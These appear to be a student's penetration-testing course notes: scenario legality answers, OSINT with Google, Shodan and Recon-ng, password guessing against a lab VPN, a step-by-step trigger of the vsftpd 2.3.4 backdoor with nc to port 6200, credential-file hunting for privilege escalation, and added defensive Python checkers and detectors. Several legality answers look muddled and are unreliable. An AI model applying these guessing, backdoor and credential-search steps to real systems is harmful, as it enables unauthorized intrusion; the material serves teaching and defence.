Pentesting Activity

ACTIVITY FINDINGS
PEN TEST 1
ACTIVITY 1: TYPES OF PEN TESTING
Scenario Questions
A business hires you to perform a penetration test. They said they will provide credentials for
you as long as you do not share them with anyone outside of the business. Before starting the
assessment, they’ve made you sign a non-disclosure agreement (NDA) and covered the rules of
engagement (ROE).
Legal
grey
A friend verbally asks you to hack his home network and gives you his public router’s IP
address.
Illegal
black
You are on a random shopping website and discover a potential vulnerability. Using your recent
knowledge from class, you attempt to validate whether the website is vulnerable to an attack.
Illegal
black
A local government hires you to perform a penetration test on their internal network, giving you
full access to all their network diagrams and their device IP list and supplying you with
administrative credentials. There is a contract in place to perform the assessment that is signed
by all appropriate parties.
White
legal
After negotiating a contract and signing all legal forms, an enterprise business hires you to
perform a penetration test. They supply you with a domain name that is in scope and a two-month assessment time.
Legal
black
A family member asks you to assess their security on their home network. You bring your
laptop, connect to their WiFi, and begin the assessment with port scans.
Illegal
black
A business hires you to perform an assessment and sends over a contract that states all company-owned hardware is within scope and provides you a list of assets. When searching the public IP
addresses of the assets from the provided lists, you determine they are hosted within Microsoft’s
cloud platform, Azure.
illegal
grey
A medium-sized business hires you to perform a penetration test and supplies you with
credentials and scope. The contract is almost finalized, but the manager of the company is
insistent that you start the assessment now to avoid lapsing into their next fiscal year.
Illegal
partial
ACTIVITY 2
1. In a browser, navigate to Google.
2. Using the site Google operand, identify the web service name and version.
MegaCorpOne's website is megacorpone.com.
3. Using the intext and site operands, create a list of user names and their email addresses.
Tom thudson@megacorpone.com
Joe joe@megacorpone.com
Tanya trivera@megacorpone.com
Matt msmith@megacorpone.com
ACTIVITY 3
Instructions: 149.56.244.87 (shodan.io)
1. Navigate to https://account.shodan.io/register, and create a free account on Shodan.io.
2. After registering, log in and navigate to https://shodan.io.
3. In a terminal session, perform an nslookup on www.megacorpone.com.
4. In Shodan, search the IP address that was returned from the nslookup query.
5. Answer the following questions:
   o What ports are open? 22, 80, 443
   o What version of SSH is the server running? OpenSSH/SSH 2.0
   o What OS is the server? Debian 10
   o What is the version of the web server running? Apache Server 2.4.17 to 2.4.38
   o Which vulnerabilities may be present on the server? (CVE numbers are fine.)
   o Where is this server located? Montreal CA
ACTIVITY 4
Instructions
1. In Kali, log in with the credentials root:kali and start Recon-ng.
   o In Recon-ng, run modules search to view all of the currently installed modules.
     modules search
   o Run modules load recon/domains-hosts/hackertarget.
   o This will load the hackertarget scanner module.
   o Modules need to be loaded prior to use.
2. In Recon-ng, type the command to view all of the currently installed modules.
   options list
   o For this activity, we'll use the following two modules:
     - recon/domains-hosts/hackertarget
     - reporting/html
3. Type the command that will query hackertarget.com for a scan against megacorpone.com.
   options set SOURCE megacorpone.com
   o The results will automatically display verbosely in the terminal window.
4. Install the reporting module then use the module.
   run
   back
   o marketplace install reporting/html
5. Type the command that shows which parameters need to be set.
   options set CREATOR pentester
   options set CUSTOMER MEGACORPONE
   o The CREATOR and CUSTOMER parameters need to be set.
   o Set the parameters as follows:
     - CREATOR: Pentester
     - CUSTOMER: MegaCorpOne
   o Type the command that runs the query so the results are saved to
     /root/.recon-ng/workspaces/default/results.html.
   o Type the command that verifies whether the configuration took effect after setting
     the options.
     options list
     run
6. View the report.
   o Generate the report so that it can be viewed as HTML in the web browser.
     xdg-open /root/.recon-ng/workspaces/default/results.html
   o How many hosts did Recon-ng discover?
     18
PEN TEST 2
ACTIVITY 1
1. On your Kali machine, open the web browser, navigate to vpn.megacorpone.com,
where you will be prompted to log in.
2. Using the list of usernames that you obtained during Day 1 without the email
extension (e.g., bsmith instead of bsmith@megacorpone.com), attempt to log in
to the website by guessing basic passwords.
   o Hint: Try variants of "Password," "SeasonYear" (e.g., Summer2021), or even the
     user's own username.
   o You only need to successfully guess ONE set of credentials to continue; the rest
     are bonus.
mcarlow Pa55word
agrofield agrofield1
thudson thudson
triversa Spring2021
3. Once logged in, download the shell script in Kali and place it in
your Downloads folder (if it doesn't automatically download to it).
4. Change the permissions on the shell script to make it executable, then run the
shell script and log in with the same credentials that you just used.
chmod +x vpn.sh
./vpn.sh
cat vpn.sh
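The guesses that worked above all follow the patterns the hint names (the username itself, "Password" with leet substitutions, a season followed by a year). The following is an added example, not part of the lab notes, of the policy check a defender would put in front of a VPN portal so that exactly those patterns are rejected at password-change time. The rule names, the 12-character minimum and the two extra credential pairs for alice are assumptions for the example; the four other pairs are the ones recorded in the notes.

```python
import re

# Undo common leet-speak substitutions before comparing against banned words,
# so "Pa55word" and "P@ssw0rd" both reduce to "password".
_LEET = str.maketrans({"0": "o", "1": "i", "3": "e", "4": "a", "5": "s",
                       "7": "t", "@": "a", "$": "s", "!": "i"})
_SEASON_YEAR = re.compile(r"^(spring|summer|fall|autumn|winter)[^a-z]*(19|20)\d\d$")
_BANNED_WORDS = ("password", "passwd", "welcome", "letmein", "qwerty")


def _normalize(text: str) -> str:
    """Lower-case and strip leet substitutions."""
    return text.lower().translate(_LEET)


def weak_password_reason(username: str, password: str, min_length: int = 12):
    """Return the first policy rule the password breaks, or None if it passes.

    Rules are checked most-specific first so the caller can tell the user what to fix.
    """
    lowered = password.lower()
    normalized = _normalize(password)
    user = username.lower()

    # Username (plain, leet-substituted or reversed) anywhere in the password.
    if len(user) >= 3 and (user in lowered or user in normalized or user[::-1] in lowered):
        return "contains the username"

    # "Password"-style words, including disguised spellings.
    if any(word in normalized for word in _BANNED_WORDS):
        return "contains a 'password' variant"

    # Season + year, e.g. Summer2021 or Spr1ng2021: de-leet the word but keep the year digits.
    season_form = re.sub(r"^(.*?)(\d{4})$",
                         lambda m: _normalize(m.group(1)) + m.group(2), lowered)
    if _SEASON_YEAR.match(season_form):
        return "season followed by a year"

    if len(password) < min_length:
        return f"shorter than {min_length} characters"
    return None


def audit_credentials(pairs):
    """Return [(username, reason)] for each pair; reason None means the password is accepted."""
    return [(user, weak_password_reason(user, pw)) for user, pw in pairs]


# The four pairs recorded in the notes plus two constructed ones (marked).
SAMPLE_CREDENTIALS = [
    ("mcarlow", "Pa55word"),
    ("agrofield", "agrofield1"),
    ("thudson", "thudson"),
    ("triversa", "Spring2021"),
    ("alice", "Tr0ub4dor"),                      # constructed
    ("alice", "correct-horse-battery-staple"),   # constructed
]

if __name__ == "__main__":
    for user, reason in audit_credentials(SAMPLE_CREDENTIALS):
        print(f"{user:10s} -> {reason or 'accepted'}")
```

The check runs the pattern rules before the length rule on purpose: "agrofield1" and "Spring2021" would also fail on length, but telling the user the real problem (the password is derived from their name or the calendar) is what stops them from resubmitting "Spring2021!!" next.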
ACT 2
ifconfig
zenmap
- Intense scan
- Edit profile (read about intense scan)
- Edit profile -> Scripting -> FTP backdoor
- 172.22.117.150 open port
ACT 3
1. Refer to your past Nmap or Zenmap scans, and look in the scan results for
Metasploitable2.
If you cannot find it by hostname, it will be the machine with the most
ports open.
2. Several of these services are exploitable; however, one is exploitable with a
Python script. Using searchsploit in Kali, search for any exploits around the
service that is listening on port 21. You're searching for an exploit that allows
you to execute a backdoor and is written in Python.
o It's important to examine scripts before running them. Some scripts
require variables to be edited within the script, whereas others can have
variables passed through the command line.
o searchsploit vsftpd
  - Backdoor
o locate 49757.py
  - File path
o cat filepath/49757.py
  - Make sure not a virus
o python filepath/49757.py 172.22.117.150
  - Buggy code rip
  - But when we cat we can see it creates telnet to host on port 21, writing the user
    and password in ascii
  - User :) opens backdoor on port 6200
o ftp 172.22.117.150
  - Name: bob :)
  - Password: anything
o nc 172.22.117.150 6200
3. Edit the script in nano. The path that is listed on the right is relative to
the /usr/share/exploitdb/exploit directory,
e.g., /usr/share/exploitdb/exploit/unix/remote/xxxxx.py .
4. We can tell from the two variables args and host that this script accepts the IP
address of the vulnerable host as an argument, so there is no need to edit the
script. Close the script using ctrl+X.
5. Run the script without any arguments to see the output of the script.
6. Now, pass in the host IP address as an argument, and run the script again. You
should see a message saying “Success, shell opened.” Type in a Linux command
to check if the shell works.
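Read from the server side, the sequence the notes reconstruct has two observable stages: a USER command whose argument carries ":)" on port 21, and a follow-up connection to port 6200. The following is an added detection example, not part of the notes and not the exploit script, that runs over captured FTP control-channel commands. The log format, the "CONNECT" marker for a bare TCP connection and the client addresses are constructed for the example; only the server address is the lab host from the notes.

```python
import re
from dataclasses import dataclass
from typing import Optional

BACKDOOR_PORT = 6200  # port the vsftpd 2.3.4 backdoor listens on once triggered

# Constructed FTP control-channel log (not from the page). Format, also made up:
#   <timestamp> <client> -> <server>:<port> <COMMAND> [argument]
# The server address is the lab host from the notes; the client addresses are invented,
# and "CONNECT" marks a bare TCP connection with no FTP command.
SAMPLE_LOG = """\
2021-06-01T10:15:02 172.22.117.1 -> 172.22.117.150:21 USER anonymous
2021-06-01T10:15:02 172.22.117.1 -> 172.22.117.150:21 PASS guest@example.com
2021-06-01T10:15:10 172.22.117.1 -> 172.22.117.150:21 QUIT
2021-06-01T10:16:40 172.22.117.1 -> 172.22.117.150:21 USER bob:)
2021-06-01T10:16:40 172.22.117.1 -> 172.22.117.150:21 PASS anything
2021-06-01T10:16:41 172.22.117.1 -> 172.22.117.150:6200 CONNECT
2021-06-01T10:20:00 172.22.117.7 -> 172.22.117.150:21 USER alice
"""

_LINE = re.compile(
    r"^(?P<ts>\S+) (?P<src>[\d.]+) -> (?P<dst>[\d.]+):(?P<port>\d+) "
    r"(?P<cmd>[A-Z]+)(?: (?P<arg>.*))?$"
)


@dataclass
class Record:
    ts: str
    src: str
    dst: str
    port: int
    cmd: str
    arg: str


def parse_line(line: str) -> Optional[Record]:
    """Parse one log line; return None for lines that do not fit the format."""
    m = _LINE.match(line.strip())
    if not m:
        return None
    return Record(m["ts"], m["src"], m["dst"], int(m["port"]), m["cmd"], m["arg"] or "")


def detect_vsftpd_backdoor(log_text: str):
    """Flag both observable stages of the backdoor and list sources seen doing both."""
    alerts, trigger_sources, shell_sources = [], set(), set()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        # Stage 1: the smiley in the USER argument is the trigger, whatever the name before it.
        if rec.port == 21 and rec.cmd == "USER" and ":)" in rec.arg:
            trigger_sources.add(rec.src)
            alerts.append((rec.ts, rec.src,
                           "USER argument contains ':)' (vsftpd 2.3.4 backdoor trigger)"))
        # Stage 2: any connection to the shell port, which a patched host never opens.
        elif rec.port == BACKDOOR_PORT:
            shell_sources.add(rec.src)
            alerts.append((rec.ts, rec.src,
                           f"connection to TCP/{BACKDOOR_PORT} (backdoor shell port)"))
    return {"alerts": alerts, "confirmed_sources": sorted(trigger_sources & shell_sources)}


if __name__ == "__main__":
    result = detect_vsftpd_backdoor(SAMPLE_LOG)
    for ts, src, msg in result["alerts"]:
        print(ts, src, msg)
    print("confirmed:", result["confirmed_sources"])
```

Either stage alone is worth an alert; a source that produces both within the same capture is a confirmed exploitation rather than a scan, which is why the two sets are intersected at the end. The legitimate logins in the sample (anonymous, alice) produce nothing.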
DAY 3
ACTIVITY 1
For each framework that you've identified as a good candidate, answer the following
questions:
1. What is the name of the C2 framework? SCYTHE
2. What operating systems do its agents support? Windows, Linux, Mac
3. What channels can the agents communicate over? HTTP, DNS, SMB
4. What language is it written in? Python
5. Is it open or closed source? Closed
6. Does the developer have a Slack or Twitter link for potential support questions?
@scythe_io
ACT 2
For each exploit you attempted (failed or successful), document the following:

- Exploit: vsftpd_234_backdoor
- Host IP address: 172.22.117.150
- Port: 21
- Service name: FTP
- Service version: 2.3.4
- Exploit outcome: Success

- Exploit: alienvault USM/OSSIM
- Host IP address: 172.22.17.150
- Port: 22
- Service name: SSH
- Service version: 5.3.0
- Exploit outcome: Fail

- Exploit: apache james
- Host IP address: 172.22.17.150
- Port: 25
- Service name: SMTP
- Service version:
- Exploit outcome: Fail

- Exploit: smtp_enum
- Host IP address: 172.22.17.150
- Port: 25
- Service name: SMTP
- Service version:
- Exploit outcome: Success
While operating through the reverse shell in Metasploit, use grep or find to search for
any interesting files.
Hint 1: Some keywords to search for include:
- admin
- key
- password
- secret
If you come across anything interesting that could be used for privilege escalation,
perform the necessary actions in order to escalate your privileges from daemon to
another user!
Hint 2: If you forget the syntax for grep or find, use the man tool or use Google!
Bonus: Once you are able to escalate your privileges to another user, see if you can
escalate that user's privileges to root.
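The same keyword search is what an administrator should run on their own hosts before an assessment, to find credential files left readable by a low-privileged account such as daemon. The following is an added example, not part of the lab notes, that implements the search in Python rather than with grep or find: it matches the four keywords from the hint against file names first and then against file contents, skips binaries and oversized files, and reports each file once. The directory tree it scans is constructed by the example itself and its contents are placeholders.

```python
import os
import re
import shutil
import tempfile
from pathlib import Path

# Keywords from the lab hint; the search is case-insensitive.
KEYWORDS = ("admin", "key", "password", "secret")
MAX_BYTES = 1_000_000  # skip large files so a log archive does not dominate the run


def _is_probably_text(data: bytes) -> bool:
    """Treat anything with a NUL byte in its first KiB as binary and skip it."""
    return b"\x00" not in data[:1024]


def find_sensitive_files(root, keywords=KEYWORDS):
    """Walk `root` and return sorted (relative POSIX path, reason) pairs.

    A file is reported once: by name if the name contains a keyword, otherwise by
    the first keyword found in its (text) contents.
    """
    root = Path(root)
    pattern = re.compile("|".join(map(re.escape, keywords)), re.IGNORECASE)
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = Path(dirpath) / name
            rel = path.relative_to(root).as_posix()
            if pattern.search(name):
                hits.append((rel, "name"))
                continue
            try:
                if path.is_symlink() or path.stat().st_size > MAX_BYTES:
                    continue
                data = path.read_bytes()
            except OSError:  # unreadable as the current user: skipped here
                continue
            if not _is_probably_text(data):
                continue
            match = pattern.search(data.decode("utf-8", errors="replace"))
            if match:
                hits.append((rel, "content:" + match.group(0).lower()))
    return sorted(hits)


def build_sample_tree():
    """Create a constructed directory tree for the demo; contents are placeholders, not secrets."""
    root = Path(tempfile.mkdtemp(prefix="audit-"))
    (root / "etc").mkdir()
    (root / "var" / "www").mkdir(parents=True)
    (root / "home" / "svc").mkdir(parents=True)
    (root / "etc" / "motd").write_text("Welcome to the lab host.\n")
    (root / "var" / "www" / "config.php").write_text("<?php $db_password = 'example-only';\n")
    (root / "home" / "svc" / "id_rsa.key").write_text("-----BEGIN EXAMPLE KEY-----\n")
    (root / "home" / "svc" / "notes.txt").write_text("TODO: rotate the admin account\n")
    (root / "home" / "svc" / "blob.bin").write_bytes(b"\x00\x01password\x00")  # binary: skipped
    return root


def cleanup(root):
    """Remove the constructed tree."""
    shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    tree = build_sample_tree()
    try:
        for rel, reason in find_sensitive_files(tree):
            print(f"{reason:18s} {rel}")
    finally:
        cleanup(tree)
```

Run as the same unprivileged account the service uses, so the result is exactly the set of files that account can read; anything world-readable under /var/www or a home directory that carries a password or key is the kind of finding the bonus step is looking for, and the fix is file permissions, not a bigger wordlist.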
DAY 5
ACT 1
i. How many Windows machines are on the network? 3
ii. What ports/services are open on the machines that suggest that they're Windows
machines? 6001, 8080, 53, 88, 135, 139, 389, 445, 464, 593, 636, 3268, 3269, 3390
iii. Can you tell which machine is the domain controller? First one, port 88 is the
giveaway
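The reasoning behind answers i to iii (SMB and RPC ports mark a Windows host, Kerberos on 88 together with LDAP marks the domain controller) can be written down as a small classifier so the same call is made consistently across a scan. The following is an added example, not part of the notes; the host addresses and port sets are constructed, and the role labels and port-to-service names are the example's own. It goes one step beyond the notes by treating SMB-only hosts as ambiguous, since Samba on Linux exposes 139 and 445 as well.

```python
# Constructed scan summary (host -> open TCP ports). Addresses and port sets are
# made up for the example and are not the page's scan results.
SAMPLE_SCAN = {
    "10.0.0.10": {53, 88, 135, 139, 389, 445, 464, 593, 636, 3268, 3269, 3389},
    "10.0.0.20": {135, 139, 445, 3389},
    "10.0.0.30": {80, 135, 445, 8080},
    "10.0.0.40": {21, 22, 23, 25, 80},
    "10.0.0.50": {139, 445},
}

# Ports that are rarely exposed by anything other than Windows.
WINDOWS_STRONG = {135: "MSRPC", 593: "RPC over HTTP", 3389: "RDP", 5985: "WinRM"}
# SMB alone is ambiguous: Samba on Linux exposes the same ports.
SMB_PORTS = {139: "NetBIOS session", 445: "SMB"}
# A domain controller must serve Kerberos and LDAP; the rest strengthen the call.
DC_REQUIRED = {88: "Kerberos", 389: "LDAP"}
DC_SUPPORTING = {464: "kpasswd", 636: "LDAPS", 3268: "Global Catalog", 3269: "Global Catalog SSL"}


def classify_host(ports):
    """Return (role, evidence) for one host's open port set; evidence maps port -> service."""
    ports = set(ports)
    if set(DC_REQUIRED) <= ports:
        evidence = {p: n for p, n in {**DC_REQUIRED, **DC_SUPPORTING}.items() if p in ports}
        return "windows-domain-controller", evidence
    strong = {p: n for p, n in WINDOWS_STRONG.items() if p in ports}
    if strong:
        return "windows", strong
    smb = {p: n for p, n in SMB_PORTS.items() if p in ports}
    if smb:
        return "smb-host (windows or samba)", smb
    return "other", {}


def classify_scan(scan):
    """Map every host to its role label."""
    return {host: classify_host(ports)[0] for host, ports in scan.items()}


def count_windows(scan):
    """Hosts confidently identified as Windows, domain controllers included."""
    return sum(1 for role in classify_scan(scan).values() if role.startswith("windows"))


def domain_controllers(scan):
    """Sorted addresses of the hosts classified as domain controllers."""
    return sorted(h for h, role in classify_scan(scan).items()
                  if role == "windows-domain-controller")


if __name__ == "__main__":
    for host, ports in SAMPLE_SCAN.items():
        role, evidence = classify_host(ports)
        print(f"{host:10s} {role:28s} {sorted(evidence)}")
    print("windows hosts:", count_windows(SAMPLE_SCAN))
    print("domain controllers:", domain_controllers(SAMPLE_SCAN))
```

The evidence dictionary is returned alongside the label so a report can say why a host was called Windows (135 and 3389 open) rather than just asserting it; on the constructed scan the count comes out to three Windows hosts with one domain controller, matching the shape of the answers above, while the SMB-only host stays flagged as undecided.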